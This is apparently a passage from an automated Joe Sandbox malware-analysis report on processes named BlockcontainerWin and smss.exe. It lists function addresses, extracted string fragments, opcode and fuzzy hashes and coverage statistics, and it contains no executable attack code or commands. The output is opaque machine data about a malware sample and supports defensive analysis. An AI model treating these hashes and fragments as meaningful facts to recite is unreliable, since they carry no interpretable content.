Instruction ID: 888750afe9878be7c1f9a05e2b2ac35fefb89362871df24a6adace27ed4033d3
Opcode Fuzzy Hash: b0c5d5df711078421b8eaba3c5ecddecd095889993ec7a5b33fa557073c4e28b
Instruction Fuzzy Hash: 90C04C01E1881A46E5557764942537E08929B94B88F958176E41FD63CBCF1C690642CF

Function 00007FF887D706C8 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1579490132.00007FF887D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff887d70000_BlockcontainerWin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cac97728a2d1ed6d51a271aecfd2584ed47f4aa2bea0e50c0b26995a7955d98f
Instruction ID: 7ff7a4a8e3ba633800eb1d9509154de1ceaf214e72bdcb026877e15797823d4a
Opcode Fuzzy Hash: cac97728a2d1ed6d51a271aecfd2584ed47f4aa2bea0e50c0b26995a7955d98f
Instruction Fuzzy Hash: FCB01200CD640F00A404317A08430BCB0607F441C4FC40270D80E400C9D84D10D48242

Function 00007FF88815DF33 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1584596742.00007FF888150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff888150000_BlockcontainerWin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91adde5a74cd1c935fce39083b90a280d1e95c7cfd07e3944d1e1b43ef131098
Instruction ID: 2e9e979dcbd3813755003fc921a08939646a4bca725f5d2b720e3bcf77cc16ab
Opcode Fuzzy Hash: 91adde5a74cd1c935fce39083b90a280d1e95c7cfd07e3944d1e1b43ef131098
Instruction Fuzzy Hash: B8B00218F0D24357B57454B4589507C08412F463C5E540975D50B552D3EF5C3841D35D

Non-executed Functions

Function 00007FF887D709B0 Relevance: 5.2, Strings: 4, Instructions: 183COMMON

Download Yara Rule

Strings

"s9, xrefs: 00007FF887D70B46
c9, xrefs: 00007FF887D70B56
!k9, xrefs: 00007FF887D70B4E
#{9, xrefs: 00007FF887D70B3E

Memory Dump Source

Source File: 00000005.00000002.1579490132.00007FF887D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff887d70000_BlockcontainerWin.jbxd

Similarity

API ID:
String ID: c9$!k9$"s9$#{9
API String ID: 0-1692736845
Opcode ID: 344b6d49f9e37fc9c29a07e6a8464c985a9b7e3c708710cd79bc294c827122d7
Instruction ID: 7597591122f1237633a3be6d46a19de57fcf34347c2155256c1e64aa9d00f4e5
Opcode Fuzzy Hash: 344b6d49f9e37fc9c29a07e6a8464c985a9b7e3c708710cd79bc294c827122d7
Instruction Fuzzy Hash: 68417B07E1946A45E21236FDB4122FD6B569F813F9F0A4377E06E891C3EC0C618782F6

Function 00007FF888158741 Relevance: 5.2, Strings: 4, Instructions: 177COMMON

Download Yara Rule

Strings

b4B, xrefs: 00007FF88815883D
b4B, xrefs: 00007FF8881588B7
b4B, xrefs: 00007FF88815878C
b4B, xrefs: 00007FF8881587DF

Memory Dump Source

Source File: 00000005.00000002.1584596742.00007FF888150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff888150000_BlockcontainerWin.jbxd

Similarity

API ID:
String ID: b4B$b4B$b4B$b4B
API String ID: 0-1756778437
Opcode ID: 93db0d82f5a1be95736a2f2e7cf76c617d5d218276fd2dc3c8fa53b902db72db
Instruction ID: 86db430d4ee3a97826652816d3766f23e365a006266532d55be269057936bcc0
Opcode Fuzzy Hash: 93db0d82f5a1be95736a2f2e7cf76c617d5d218276fd2dc3c8fa53b902db72db
Instruction Fuzzy Hash: C1517C75E08A5E8EEBA5DB5884547AEBBF1FB64340F5441BAC01DE7282DF382842CB41

Analysis Process: smss.exePID: 7508, Parent PID: 2476COMMON

Execution Graph

Execution Coverage:	6.8%
Dynamic/Decrypted Code Coverage:	22.2%
Signature Coverage:	0%
Total number of Nodes:	9
Total number of Limit Nodes:	0

Executed Functions

Function 00007FF887D922AB Relevance: .3, Instructions: 328COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000032.00000002.2367994017.00007FF887D91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D91000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_50_2_7ff887d91000_smss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85a8c9f3d1275166197b18e7348162520343232718cfe519d7ffb78304408481
Instruction ID: 1f4e0abacfe13f21e1ff5c623c9a9954c08eda33ea58ff3d25e02a59319c1cc9
Opcode Fuzzy Hash: 85a8c9f3d1275166197b18e7348162520343232718cfe519d7ffb78304408481
Instruction Fuzzy Hash: 1CB1348588E3C16FD31347745C356AABFB09E53214B0E86EBC0C58F4E3E609695AD363

Function 00007FF887D92323 Relevance: .3, Instructions: 276COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000032.00000002.2367994017.00007FF887D91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D91000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_50_2_7ff887d91000_smss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: abd8b9937d08a802ee6b6eff0344a8d016017a091416bf6c0cc4307a3ae332e5
Instruction ID: ef47beb1d5cbaece63ecbf53a4e78545f30e9cd72296265b9382ccb6399160cb
Opcode Fuzzy Hash: abd8b9937d08a802ee6b6eff0344a8d016017a091416bf6c0cc4307a3ae332e5
Instruction Fuzzy Hash: 57A1338588E3C16FD31347745C756A6BFB0AE53214B1E86EBC0C1CB4E3E609699AC363

Function 00007FF887D70D78 Relevance: 5.2, Strings: 4, Instructions: 228
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

"9B, xrefs: 00007FF887D70E01
r6B, xrefs: 00007FF887D70ED7
b4B, xrefs: 00007FF887D70F47
r6B, xrefs: 00007FF887D70EF5

Memory Dump Source

Source File: 00000032.00000002.2367994017.00007FF887D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_50_2_7ff887d70000_smss.jbxd

Similarity

API ID:
String ID: "9B$b4B$r6B$r6B
API String ID: 0-1939837083
Opcode ID: 555571b5eb4f36eea492436b2451db1612e5413ef8d2ad11b98e649703660130
Instruction ID: febae67f6166cb1766aaf286723bc8b1b0fb7767d7a0ca20e00c8741b9266b4a
Opcode Fuzzy Hash: 555571b5eb4f36eea492436b2451db1612e5413ef8d2ad11b98e649703660130
Instruction Fuzzy Hash: ED71CF71918A9D8FE789DB68C8283AD7FF1FBA6754F4002AAC04AD72D6DE781815C701

Function 00007FF88815F062 Relevance: 4.1, Strings: 3, Instructions: 328
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

r6B, xrefs: 00007FF88815F3C2
r6B, xrefs: 00007FF88815F113
r6B, xrefs: 00007FF88815F0C3

Memory Dump Source

Source File: 00000032.00000002.2543660952.00007FF88815C000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF88815C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_50_2_7ff88815c000_smss.jbxd

Similarity

API ID:
String ID: r6B$r6B$r6B
API String ID: 0-1049672097
Opcode ID: 725a8bfb5976f5f0a644c07ec9332bd74179e388160e5bd55507daf53cc146aa
Instruction ID: db6a784bd2e3436b91a1228a7053e314007b8a3b87b2070b2c5f20690718f8cb
Opcode Fuzzy Hash: 725a8bfb5976f5f0a644c07ec9332bd74179e388160e5bd55507daf53cc146aa
Instruction Fuzzy Hash: 21C1C274A28A468FE789DB28C0956A4BBE1FF58350F444279C44EC7A86DF28F851CB85

Function 00007FF88816DA62 Relevance: 4.1, Strings: 3, Instructions: 327
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

r6B, xrefs: 00007FF88816DAC3
r6B, xrefs: 00007FF88816DDC2
r6B, xrefs: 00007FF88816DB13

Memory Dump Source

Source File: 00000032.00000002.2543660952.00007FF888165000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888165000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_50_2_7ff888165000_smss.jbxd

Similarity

API ID:
String ID: r6B$r6B$r6B
API String ID: 0-1049672097
Opcode ID: 7689b26e6be676367f8927378d0a6ea45e27156115bf9ea5c7a0660315c6a5b5
Instruction ID: eab3b95f3bf37f635a00c6845de6883847322afec8300f1d3d5987b5ac75ac5b
Opcode Fuzzy Hash: 7689b26e6be676367f8927378d0a6ea45e27156115bf9ea5c7a0660315c6a5b5
Instruction Fuzzy Hash: ADC1A134A1CA469FE74ADB28C0916B4BBA1FF45340F4441B9C48EC7A87CF69B851CB85

Function 00007FF888168192 Relevance: 4.1, Strings: 3, Instructions: 323
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

r6B, xrefs: 00007FF8881681F3
r6B, xrefs: 00007FF8881684F2
r6B, xrefs: 00007FF888168243

Memory Dump Source

Source File: 00000032.00000002.2543660952.00007FF888165000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888165000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_50_2_7ff888165000_smss.jbxd

Similarity

API ID:
String ID: r6B$r6B$r6B
API String ID: 0-1049672097
Opcode ID: 02944cb5551c6583e8d69ae8ad852efb3befae160e543209cdb5df7e06ff3d97
Instruction ID: 944fba79a98dfea68c6d779edf1b89615ed950d524d6c8173c3f736ebe84a8e4
Opcode Fuzzy Hash: 02944cb5551c6583e8d69ae8ad852efb3befae160e543209cdb5df7e06ff3d97
Instruction Fuzzy Hash: D6C1C07491CA468FE75ADF28C0916B4BBA1FF59340F4441B9C48EC7A86EF28F851CB85

Function 00007FF887D991E1 Relevance: 4.0, Strings: 3, Instructions: 290
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

p[D, xrefs: 00007FF887D994ED
XE, xrefs: 00007FF887D99230
r6B, xrefs: 00007FF887D99409

Memory Dump Source

Source File: 00000032.00000002.2367994017.00007FF887D91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D91000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_50_2_7ff887d91000_smss.jbxd

Similarity

API ID:
String ID: XE$p[D$r6B
API String ID: 0-863143724
Opcode ID: 71f5b1770bbbcab5ee044a28b5a40da3bc7dbb5821f1a215f3bbc3dc92c9240d
Instruction ID: a711e5e6820f4db2c53cd45a50f1c10ba4d22fd70c8364badf1cfa2a7419783b
Opcode Fuzzy Hash: 71f5b1770bbbcab5ee044a28b5a40da3bc7dbb5821f1a215f3bbc3dc92c9240d
Instruction Fuzzy Hash: 0091A130A1894A8FEB44EF68C4957BD77E2FFA8354B50027AD40EC7296DF38A842C741

Function 00007FF887D70B3F Relevance: 3.8, Strings: 3, Instructions: 55
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

"s9, xrefs: 00007FF887D70B46
c9, xrefs: 00007FF887D70B56
!k9, xrefs: 00007FF887D70B4E

Memory Dump Source

Source File: 00000032.00000002.2367994017.00007FF887D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_50_2_7ff887d70000_smss.jbxd

Similarity

API ID:
String ID: c9$!k9$"s9
API String ID: 0-3426396564
Opcode ID: 05915475ce142c3818c916c06dc2329d3cac97bb38c346fb54e39def6396cbbe
Instruction ID: 4ef9995dbdc341e0d9a23f7c0cbb1f87ccc7630dcc7fc9dba9b71a820a628832
Opcode Fuzzy Hash: 05915475ce142c3818c916c06dc2329d3cac97bb38c346fb54e39def6396cbbe
Instruction Fuzzy Hash: F501262772E95E4B8705663DF8405EC7B50EAC7132B9903F7D045C7592E511185BC3D0

Function 00007FF888155700 Relevance: 3.2, Strings: 2, Instructions: 706
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

p]L, xrefs: 00007FF888155968
0#L, xrefs: 00007FF88815585A

Memory Dump Source

Source File: 00000032.00000002.2543660952.00007FF888154000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888154000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_50_2_7ff888154000_smss.jbxd

Similarity

API ID:
String ID: 0#L$p]L
API String ID: 0-4069893409
Opcode ID: 2614bcbd303ec6bd8331c470240781f4a218252abb0f06810b8f3022bd60a3b7
Instruction ID: 806265feac609e542effd318fd16b071794a9f9a4e9783bde01bd656b899bdc5
Opcode Fuzzy Hash: 2614bcbd303ec6bd8331c470240781f4a218252abb0f06810b8f3022bd60a3b7
Instruction Fuzzy Hash: 7132A234A18A198FDB98DF18C899AB87BE2FF54354F5441B9D40EC7292DF28EC45CB84

Function 00007FF8881520F9 Relevance: 3.1, Strings: 2, Instructions: 555
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

b4B, xrefs: 00007FF8881524BA
d, xrefs: 00007FF8881523E7

Memory Dump Source

Source File: 00000032.00000002.2543660952.00007FF888150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_50_2_7ff888150000_smss.jbxd

Similarity

API ID:
String ID: b4B$d
API String ID: 0-1886680559
Opcode ID: 62197321fb8b597ecda5376189d8d3e96d5328cf00dc2e74ffd8eafbcc5a4249
Instruction ID: 6c95b7514b7d541495b73c02b94f6e1c4e5c2e41de1bb7b896dab535de12bb37
Opcode Fuzzy Hash: 62197321fb8b597ecda5376189d8d3e96d5328cf00dc2e74ffd8eafbcc5a4249
Instruction Fuzzy Hash: F9020E32A08A468FD788DB28D8856B677E1FF85350F1445B9D49EC7287DE28F843C782

Function 00007FF88815F548 Relevance: 2.7, Strings: 2, Instructions: 157
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

r6B, xrefs: 00007FF88815F567
, xrefs: 00007FF88815F5B2

Memory Dump Source

Source File: 00000032.00000002.2543660952.00007FF88815C000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF88815C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_50_2_7ff88815c000_smss.jbxd

Similarity

API ID:
String ID: $r6B
API String ID: 0-2315467569
Opcode ID: 11dddc684786502e2f83ead6ca3721e948da853cb1125282ef175968c9b33999
Instruction ID: 6823ffb49c7a31a1f7c1188703760a8b496dae9c7c56c1bb5c245f2d2b4ff98f
Opcode Fuzzy Hash: 11dddc684786502e2f83ead6ca3721e948da853cb1125282ef175968c9b33999
Instruction Fuzzy Hash: BF515734E1850A8FDB58DFA8D4546BDBBB1FF48340F1041BAC01AE7296DF382901CB45

Function 00007FF888168668 Relevance: 2.7, Strings: 2, Instructions: 152
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

r6B, xrefs: 00007FF888168697
, xrefs: 00007FF8881686E2

Memory Dump Source

Source File: 00000032.00000002.2543660952.00007FF888165000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888165000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_50_2_7ff888165000_smss.jbxd

Similarity

API ID:
String ID: $r6B
API String ID: 0-2315467569
Opcode ID: a4c2f70ff60f44775d3ae3c11962e2608e1c99a592c19e540718236adc45545c
Instruction ID: 08abc1f15c7eb28c27c42b07d28b23ce2181445f6c4584c6027719befb6b8f1d
Opcode Fuzzy Hash: a4c2f70ff60f44775d3ae3c11962e2608e1c99a592c19e540718236adc45545c
Instruction Fuzzy Hash: 22515C75D0854A8FDB6ADBA8D8646BDBBB1FF54340F1040BAC05AE7286EF382841CB55

Function 00007FF88816DF48 Relevance: 2.6, Strings: 2, Instructions: 126
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

r6B, xrefs: 00007FF88816DF67
, xrefs: 00007FF88816DFB2

Memory Dump Source

Source File: 00000032.00000002.2543660952.00007FF888165000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888165000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_50_2_7ff888165000_smss.jbxd

Similarity

API ID:
String ID: $r6B
API String ID: 0-2315467569
Opcode ID: 2a6ccb7bb1f6b17b46ca44c7d36b37bdabd6f660a3454bf562b7b37965c9b731
Instruction ID: 4c48637279c5eb40ea47da62181dd3df3f303a6b53b5372c4b89ba3cdd99a178
Opcode Fuzzy Hash: 2a6ccb7bb1f6b17b46ca44c7d36b37bdabd6f660a3454bf562b7b37965c9b731
Instruction Fuzzy Hash: 4E412834D0864E9FEB4ADFA4C4959BDBBB1FF58340F5040BAC05AA7296CF396902CB15

Function 00007FF88815DF7D Relevance: 2.6, Strings: 2, Instructions: 107COMMON

Download Yara Rule

Strings

r6B, xrefs: 00007FF88815DF8B
r6B, xrefs: 00007FF88815DFC9

Memory Dump Source

Source File: 00000032.00000002.2543660952.00007FF88815C000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF88815C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_50_2_7ff88815c000_smss.jbxd

Similarity

API ID:
String ID: r6B$r6B
API String ID: 0-2860294223
Opcode ID: 41db449e665c8a9a4417046c2b56ceedd59ad7ffd2769ff09f446ce8ae640638
Instruction ID: a2715409da238b1b1e142b077ab023023a96f39070fd52dde17a694137b3d9a6
Opcode Fuzzy Hash: 41db449e665c8a9a4417046c2b56ceedd59ad7ffd2769ff09f446ce8ae640638
Instruction Fuzzy Hash: 5B311E35B0894A8FD758DA5CE4919BCBBE2FF85360B54417AD01ED3682DF24B812CB84

Function 00007FF8881719FD Relevance: 2.6, Strings: 2, Instructions: 99COMMON

Download Yara Rule

Strings

r6B, xrefs: 00007FF888171A0B
r6B, xrefs: 00007FF888171A49

Memory Dump Source

Source File: 00000032.00000002.2543660952.00007FF888165000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888165000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_50_2_7ff888165000_smss.jbxd

Similarity

API ID:
String ID: r6B$r6B
API String ID: 0-2860294223
Opcode ID: 38cdf80ee4dc2a779597ae77a28469eb11efbac77930f54a017f2b4754c26ff5
Instruction ID: f75f90e39bdc2351afa8abfac8ddc90ea3dde92277d33415206c8343bc17274c
Opcode Fuzzy Hash: 38cdf80ee4dc2a779597ae77a28469eb11efbac77930f54a017f2b4754c26ff5
Instruction Fuzzy Hash: 4D31AF35A0894A8FD748DB58D491AACFBE2FF84350F14417AC01ED3686DF24B852CB84

Function 00007FF88816C99B Relevance: 2.6, Strings: 2, Instructions: 95COMMON

Download Yara Rule

Strings

r6B, xrefs: 00007FF88816C9A9
r6B, xrefs: 00007FF88816C9E7

Memory Dump Source

Source File: 00000032.00000002.2543660952.00007FF888165000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888165000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_50_2_7ff888165000_smss.jbxd

Similarity

API ID:
String ID: r6B$r6B
API String ID: 0-2860294223
Opcode ID: 51cbc0533840b6fc37e68a28ca0e2bf8a01be2470e9ca0908c62550a4703e91c
Instruction ID: dff900162dc16f635acf0df4be4b9bfeecea4b8cd239ae876414824997a90606
Opcode Fuzzy Hash: 51cbc0533840b6fc37e68a28ca0e2bf8a01be2470e9ca0908c62550a4703e91c
Instruction Fuzzy Hash: A0314D71A5890A8FDB88DB68D5919BDB7B2FF98350B504139D01ED3682DF24BC12CB85

Function 00007FF88815F7A5 Relevance: 1.7, Strings: 1, Instructions: 442COMMON

Download Yara Rule

Strings

b4B, xrefs: 00007FF88815FC42

Memory Dump Source

Source File: 00000032.00000002.2543660952.00007FF88815C000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF88815C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_50_2_7ff88815c000_smss.jbxd

Similarity

API ID:
String ID: b4B
API String ID: 0-3849415641
Opcode ID: 47e6b9d6004ba2e5f15dc9ce066d32f07a36a2971617dee567603e1399aade4d
Instruction ID: 58b3733d1fb01bf89310b1571b23ba3c52687ff7ea95d7f1f1789d8d45edd58b
Opcode Fuzzy Hash: 47e6b9d6004ba2e5f15dc9ce066d32f07a36a2971617dee567603e1399aade4d
Instruction Fuzzy Hash: C6F1D234928656CFEB59CF18C4E06B53BA1FF45350F5446BDC84ACB68ADB38E882CB45

Function 00007FF88816E1AF Relevance: 1.7, Strings: 1, Instructions: 424COMMON

Download Yara Rule

Strings

b4B, xrefs: 00007FF88816E642

Memory Dump Source

Source File: 00000032.00000002.2543660952.00007FF888165000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888165000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_50_2_7ff888165000_smss.jbxd

Similarity

API ID:
String ID: b4B
API String ID: 0-3849415641
Opcode ID: a3cae29cb96daad3589258dba4d9841168b7ec354be00c81ee0585f38450d6af
Instruction ID: 08f8f55182fb2e8954984803df6f5051277ebec946c64d0b711d4072c81b9c47
Opcode Fuzzy Hash: a3cae29cb96daad3589258dba4d9841168b7ec354be00c81ee0585f38450d6af
Instruction Fuzzy Hash: 61F1B1745186568FEB59CF18C4E46B53BA1FF45310F6442BDC88B8B68ADB38F881CB45

Function 00007FF88815211A Relevance: 1.5, Strings: 1, Instructions: 299COMMON

Download Yara Rule

Strings

d, xrefs: 00007FF8881523E7

Memory Dump Source

Source File: 00000032.00000002.2543660952.00007FF888150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_50_2_7ff888150000_smss.jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: 09c5e1ead7f88b72c5e44f497aae68020411925873921990207330fb82e25e87
Instruction ID: fe326255ca4e15f31ae3a869f0625660fecf35f38ca770afafd2fd142e5d5f3d
Opcode Fuzzy Hash: 09c5e1ead7f88b72c5e44f497aae68020411925873921990207330fb82e25e87
Instruction Fuzzy Hash: C0919C31A18A098BDB9CDE08D485A3677E1FF98340F2445BDD84AC729ADE35F843CB85

Function 00007FF88815D29B Relevance: 1.5, Strings: 1, Instructions: 241COMMON

Download Yara Rule

Strings

/B, xrefs: 00007FF88815D2B6

Memory Dump Source

Source File: 00000032.00000002.2543660952.00007FF88815C000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF88815C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_50_2_7ff88815c000_smss.jbxd

Similarity

API ID:
String ID: /B
API String ID: 0-1225004542
Opcode ID: 85bb7e0d06009f8e1bc1bb5e213ac3ddb87969301229fba8beeda42558f45ae4
Instruction ID: 13b374c196c626f3c2287072737b3e872162401a6e6d27b114360488b2408e37
Opcode Fuzzy Hash: 85bb7e0d06009f8e1bc1bb5e213ac3ddb87969301229fba8beeda42558f45ae4
Instruction Fuzzy Hash: 40818C74D1C64A8FEB94EBA8C8556FC7BA1FF59380F5401B9D00ED7182DF28A882C705

Function 00007FF888170D1B Relevance: 1.5, Strings: 1, Instructions: 222COMMON

Download Yara Rule

Strings

/B, xrefs: 00007FF888170D36

Memory Dump Source

Source File: 00000032.00000002.2543660952.00007FF888165000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888165000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_50_2_7ff888165000_smss.jbxd

Similarity

API ID:
String ID: /B
API String ID: 0-1225004542
Opcode ID: 75acfb3e8a0d198be6472ca6f5e219d320fd4924a47ee045f5c62735b03d474d
Instruction ID: 02e1d87f6f325931a312cac5d3e559a684c3d3eaa9af05077fa4293a34aeed7e
Opcode Fuzzy Hash: 75acfb3e8a0d198be6472ca6f5e219d320fd4924a47ee045f5c62735b03d474d
Instruction Fuzzy Hash: 47719A34D1C74A8EEB95EB68C854ABDBBA1FF59780F1401BED00ED718ADF286842C745

Function 00007FF887D70940 Relevance: 1.5, Strings: 1, Instructions: 205COMMON

Download Yara Rule

Strings

hL_H, xrefs: 00007FF887D7BC6E

Memory Dump Source

Source File: 00000032.00000002.2367994017.00007FF887D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_50_2_7ff887d70000_smss.jbxd

Similarity

API ID:
String ID: hL_H
API String ID: 0-3815963757
Opcode ID: 1a74132a221447335601109afb4270e4a468623301b6827d588c552a159e988f
Instruction ID: e748729bd493b334eae31ac19f4ae39f30d76aad5e1fd37f84723aebda7282d2
Opcode Fuzzy Hash: 1a74132a221447335601109afb4270e4a468623301b6827d588c552a159e988f
Instruction Fuzzy Hash: 5351E531A4CB048FD7589A1CE88667977E1FB99764F14427EE48EC3296DE35AC02C782

Function 00007FF8881663FB Relevance: 1.4, Strings: 1, Instructions: 165COMMON

Download Yara Rule

Strings

/B, xrefs: 00007FF888166416

Memory Dump Source

Source File: 00000032.00000002.2543660952.00007FF888165000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888165000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_50_2_7ff888165000_smss.jbxd

Similarity

API ID:
String ID: /B
API String ID: 0-1225004542
Opcode ID: 690716c225a54f0ad0904f09dab59807edcbf0f6940c0b6673e1a3ef8acddc3b
Instruction ID: d716ea19b148390a71b818148d5d95b40e3d169348fb74fe26a701f986c25628
Opcode Fuzzy Hash: 690716c225a54f0ad0904f09dab59807edcbf0f6940c0b6673e1a3ef8acddc3b
Instruction Fuzzy Hash: 4F517734D18A4A8EEB96EBA8C4556BDBBB0FF09384F5404BAC05FD7196DF287841C705

Function 00007FF88817087A Relevance: 1.4, Strings: 1, Instructions: 153COMMON

Download Yara Rule

Strings

(3K, xrefs: 00007FF888170B50

Memory Dump Source

Source File: 00000032.00000002.2543660952.00007FF888165000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888165000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_50_2_7ff888165000_smss.jbxd

Similarity

API ID:
String ID: (3K
API String ID: 0-2224738633
Opcode ID: ff9edf052d76529213d8ab328251d23f4f9b1ff6496e346058af27f9592c066e
Instruction ID: 4bc31d5b9544f746786dfe37706e6b2cb6f70a3a6bf43a478f911d917b01becd
Opcode Fuzzy Hash: ff9edf052d76529213d8ab328251d23f4f9b1ff6496e346058af27f9592c066e
Instruction Fuzzy Hash: 08510974D08A5E8FDB98EB58C494AB87BF1FB68704F1401BED00EE3695DB346984CB40

Function 00007FF8881671A3 Relevance: 1.4, Strings: 1, Instructions: 111COMMON

Download Yara Rule

Strings

r6B, xrefs: 00007FF8881671C0

Memory Dump Source

Source File: 00000032.00000002.2543660952.00007FF888165000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888165000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_50_2_7ff888165000_smss.jbxd

Similarity

API ID:
String ID: r6B
API String ID: 0-2624010786
Opcode ID: db015bed42651ef97611b13646c54725a3f2d8e8cc5363120ac8bad83de41602
Instruction ID: 2e55e295e192d4abc8639c43dd2bfca6f6ceae6de0f9db6e28659861c536df38
Opcode Fuzzy Hash: db015bed42651ef97611b13646c54725a3f2d8e8cc5363120ac8bad83de41602
Instruction Fuzzy Hash: 51312875F1890A8FD759EB6894615B8BBE1FF44350F40063AD09EC3682DF28BC12C789

Function 00007FF888171AD3 Relevance: 1.3, Strings: 1, Instructions: 91COMMON

Download Yara Rule

Strings

r6B, xrefs: 00007FF888171AE5

Memory Dump Source

Source File: 00000032.00000002.2543660952.00007FF888165000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888165000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_50_2_7ff888165000_smss.jbxd

Similarity

API ID:
String ID: r6B
API String ID: 0-2624010786
Opcode ID: bdea00fbdea4a23ec25ebae41a1721a0a132ec097c1fb62b719c448a402a438a
Instruction ID: 829495e058fbbf92b562ed499c33d95564009b79aa66f9f7e16ee63d6c5e0343
Opcode Fuzzy Hash: bdea00fbdea4a23ec25ebae41a1721a0a132ec097c1fb62b719c448a402a438a
Instruction Fuzzy Hash: BF21D235A0C6894FE749E7A898522A8BBF5FF46390F5401BED14EC71C7EF186806C355

Function 00007FF88815E058 Relevance: 1.3, Strings: 1, Instructions: 90COMMON

Download Yara Rule

Strings

r6B, xrefs: 00007FF88815E065

Memory Dump Source

Source File: 00000032.00000002.2543660952.00007FF88815C000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF88815C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_50_2_7ff88815c000_smss.jbxd

Similarity

API ID:
String ID: r6B
API String ID: 0-2624010786
Opcode ID: 72f7fd1183f6d5b2e20d9645ac75a989b8cd60e6a4c36da0345bb3d536f797d3
Instruction ID: 487c77bae0aeb252fc6b130df80ad0e4d0575e02c71681ae3af2b975bf5798c6
Opcode Fuzzy Hash: 72f7fd1183f6d5b2e20d9645ac75a989b8cd60e6a4c36da0345bb3d536f797d3
Instruction Fuzzy Hash: 5E21D325F0CA894FE7959B6898522B87FE1FF463A0F5401BAD05EC79C2DF186806C345

Function 00007FF887D98AE9 Relevance: 1.3, Strings: 1, Instructions: 87COMMON

Download Yara Rule

Strings

